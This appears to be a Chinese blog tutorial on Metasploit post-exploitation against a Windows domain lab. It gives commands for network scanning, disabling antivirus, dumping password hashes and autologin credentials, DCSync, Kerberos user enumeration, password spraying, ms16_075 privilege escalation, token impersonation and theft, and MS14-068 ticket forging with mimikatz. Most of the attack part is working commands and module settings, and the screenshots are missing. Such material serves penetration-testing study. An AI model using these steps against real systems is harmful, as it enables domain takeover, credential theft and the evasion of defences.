metasploit进阶3

25 篇文章 2 订阅
4 篇文章 0 订阅

参考:https://longwaer.blog.csdn.net/article/details/122751394

用花生壳让公网的webshell 访问到我们内网的kali
参考:链接 f5 搜索花生壳

https://blog.csdn.net/HBohan/article/details/120922360?utm_source=app&app_version=5.1.1&code=app_1562916241&uLinkId=usr1mkqgl919blen

域信息收集

1.常用信息收集模块

auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机,这不能通过代理使用
auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口
auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描,默认扫描1-10000端口
auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
auxiliary/scanner/ftp/ftp_version #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title #探测内网http服务的标题
auxiliary/scanner/smb/smb_version #发现内网smb服务,基于默认的445端口
auxiliary/scanner/mssql/mssql_schemadump #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname

我们这里就挑smb的来进行扫描:

use auxiliary/scanner/smb/smb_version #选择攻击模块
set rhost 10.10.10.0/24 #设置网段
set THREADS 20 #设置线程

在这里插入图片描述

从图中我们是可以看出是存在域环境的。
但我们发现是域环境时,则可以利用模块来进行信息收集:
首先通过进程迁移到域用户权限:
在这里插入图片描述
在这里插入图片描述

2.收集域信息

run post/windows/gather/enum_logged_on_users #查看登录过的用户信息
run post/windows/gather/enum_ad_groups #查看组信息
run post/windows/gather/enum_domain #定位域控
run post/windows/gather/enum_ad_computers #域内所有机器
run post/windows/gather/enum_patches #发现缺失的补丁
run post/multi/recon/local_exploit_suggester #快速识别可能被利用的漏洞
run post/windows/manage/migrate #自动进程迁移
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav #关闭杀毒软件
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/manage/autoroute #查看路由信息
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run post/windows/gather/enum_applications #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump #dump出所有用户的hash
run post/windows/gather/enum_domain_tokens #寻找域token

使用常用模块进行域内信息收集:

获取登陆用户的SID:

利用失败了,有知道的师傅请告知万分感谢!在这里插入图片描述

3.获取域控信息及域内主机信息:

在这里插入图片描述

4.获取域token:

在这里插入图片描述

5.获取域用户的hash:(需要管理员权限)

在这里插入图片描述

dcsync_ntlm:

#通过DCSync检索用户帐户NTLM散列、SID和RID
在这里插入图片描述

6.密码喷射

1.检测 用户账号 存在用户

或者可以用github的字典
https://github.com/attackdebris/kerberos_enum_userlists
通过从上面的信息收集,我们可以对域内用户进行枚举:
通过提示语来进行判断是否存在,required表示存在

use auxiliary/gather/kerberos_enumusers 
set DOMAIN redteam.club
set RHOSTS 10.10.10.142
set USER_FILE 用户名字典 

在这里插入图片描述

在这里插入图片描述

利用失败了(原因)。。。

在这里插入图片描述

原因:用了中文路径

2.枚举后,则可以使用密码来进行尝试爆破:

use auxiliary/scanner/smb/smb_login #密码爆破

由于这个模块爆破三次,就会锁定,所以我们明智的方法就是使用一个密码去试多个账户:

假设已经获取了明文密码,则可以用来进行爆破:
在这里插入图片描述
用收集到的user名做字典,开始爆破
在这里插入图片描述

权限提升

getsystem/getprivs

1.发现无法不是最高权限,getsystem/getprivs并未成功
2.一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

ms16-075方法:

①msf窗口1执行监听命令
②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=x.x.x.x lport=666

1.令牌登录

获取session后,我们可以使用进程迁移(migrate),同样我们可以

1.使用假冒令牌登陆:

load incognito #加载
list_tokens -u #列出当前系统可用的token
impersonate_token 'NT AUTHORITY\SYSTEM' #假冒system 

必须先 load incognito,后面就能tab 键补齐

在这里插入图片描述
这里同样可以假冒域用户的权限:

2.窃取令牌

steal_token窃取令牌:主要通过ps查看pid值,来进行窃取:

在这里插入图片描述

使用drop_token则可以返回原始权限,和假冒令牌中的rev2self作用一样。
在这里插入图片描述

3.注意

但窃取令牌是不能窃取域用户的,假冒和迁移是可以使用域用户的token和进程。
但两者的区别在于: 假冒可以退回原始权限,而迁移后,是不能退回原始权限。
在这里插入图片描述

(到域用户)前者假冒(list_token)后不能使用getuid,而后者(migrate ps)可以使用。

在这里插入图片描述

域普通用户提权到域控权限

win2008里可以使 MS14-068 exp模块对域普通用户进行提取
ms14-068使用可看我的另外一篇博客MS14-068漏洞进行提权

 Name      Current Setting                                 Required  Description
   ----      ---------------                                 --------  -----------
   DOMAIN    redteam.club                                    yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD  123456                                          yes       The Domain User password
   RHOSTS    10.10.10.137                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     88                                              yes       The target port
   Timeout   10                                              yes       The TCP timeout to establish connection and read data
   USER      administrator                                   yes       The Domain User
   USER_SID  S-1-5-21-3439616436-2844000184-3841763578-1105  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000


在这里插入图片描述

失败原因——不是winserver2008

1.成功会生成.bin文件

在这里插入图片描述

2.mimikatz对bin文件进行转换

kerberos::clist "xxxx_windows.kerberos_xxxxx.bin" /export

生成.kirbi文件
在这里插入图片描述

3.使用kiwi模块进行票据注入/或者使用 mimikatz导入 bin文件 。

keberos::ptc xxxx_windows.kerberos_xxxxx.bin
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值